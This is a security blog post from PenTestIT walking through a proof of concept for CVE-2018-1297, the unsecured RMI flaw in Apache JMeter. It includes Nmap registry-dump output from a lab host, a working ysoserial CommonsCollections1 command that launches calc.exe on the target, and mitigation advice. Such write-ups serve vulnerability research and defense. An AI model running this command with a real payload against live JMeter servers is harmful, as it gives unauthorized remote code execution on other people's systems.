Apache JMeter RMI Code Execution PoC (CVE-2018-1297)

PenTestIT RSS Feed

Recently, I read about a remote code execution (RCE) vulnerability; CVE-2018-1297, that affects yet another Apache product - JMeter. As you might know, “TheApache JMeter™ application is open source software, a 100% pure Java application designed to load test functional behavior and measure performance.” The CVE Mitre page does not mention a lot of details, mentioning just that - When using Distributed Test only (RMI based), Apache JMeter 2.x and 3.x uses an unsecured RMI connection. This could allow an attacker to get Access to JMeterEngine and send unauthorized code. However, the announces mailing list gave out some more information. With that information, I tired to see if I could create a proof-of-concept code for CVE-2018-1297.

But before we do that, let’s get to know a bit about Java Remote Method Invocation (Java RMI). Java RMI allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine on different host. It provides for remote communication between programs written in the Java programming language. You know where this is going right? By default, it runs on the 1099/TCP port.

I re-read the mailing list for the version, and downloaded a couple of versions of Apache JMeter from it’s archive page. On un-compressing the archive, I read through the jmeter-server file and executed the jmeter-server.bat batch file.

The default jmeter-server file contains the following lines:

${DIRNAME}/jmeter ${RMI_HOST_DEF} -Dserver_port=${SERVER_PORT:-1099} -s -j jmeter-server.log "$@"

This confirmed the PORT. Now, I fired up the trusty old Nmap and got the following results:

nmap -p 1099 10.0.2.15
PORT     STATE SERVICE  REASON          VERSION
1099/tcp open  java-rmi syn-ack ttl 128 Java RMI Registry
| rmi-dumpregistry:
|   JMeterEngine
|      implements java.rmi.Remote, org.apache.jmeter.engine.RemoteJMeterEngine,
|     extends
|       java.lang.reflect.Proxy
|       fields
|           Ljava/lang/reflect/InvocationHandler; h
|             java.rmi.server.RemoteObjectInvocationHandler
|             @10.0.2.15:53142
|             extends
|               java.rmi.server.RemoteObject
|     Custom data
|       Classpath
|         file:/C:/Users/Adam/Downloads/apache-jmeter-2.13/lib/avalon-framework-4.1.4.jar
|         file:/C:/Users/Adam/Downloads/apache-jmeter-2.13/lib/bsf-2.4.0.jar
|         file:/C:/Users/Adam/Downloads/apache-jmeter-2.13/lib/bsh-2.0b5.jar
|         file:/C:/Users/Adam/Downloads/apache-jmeter-2.13/lib/bshclient.jar
|         file:/C:/Users/Adam/Downloads/apache-jmeter-2.13/lib/commons-codec-1.10.jar
|         file:/C:/Users/Adam/Downloads/apache-jmeter-2.13/lib/commons-collections-3.2.1.jar
SNIP

CVE-2018-1297 PoC:

This was it! Really, nothing else was needed. However, for fun I loaded another trusted old tool - ysoserial with the following command line options and nothing else was needed:

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 10.0.2.15 1099 CommonsCollections1 "calc.exe"

CVE-2018-1297

As far as mitigating this vulnerability, it is suggested that you upgrade your Java installation to Java 8 or Java 9 and download the latest Apache JMeter 4.0 version and use the default enabled authenticated SSL RMI connection.

The post Apache JMeter RMI Code Execution PoC (CVE-2018-1297) appeared first on PenTestIT.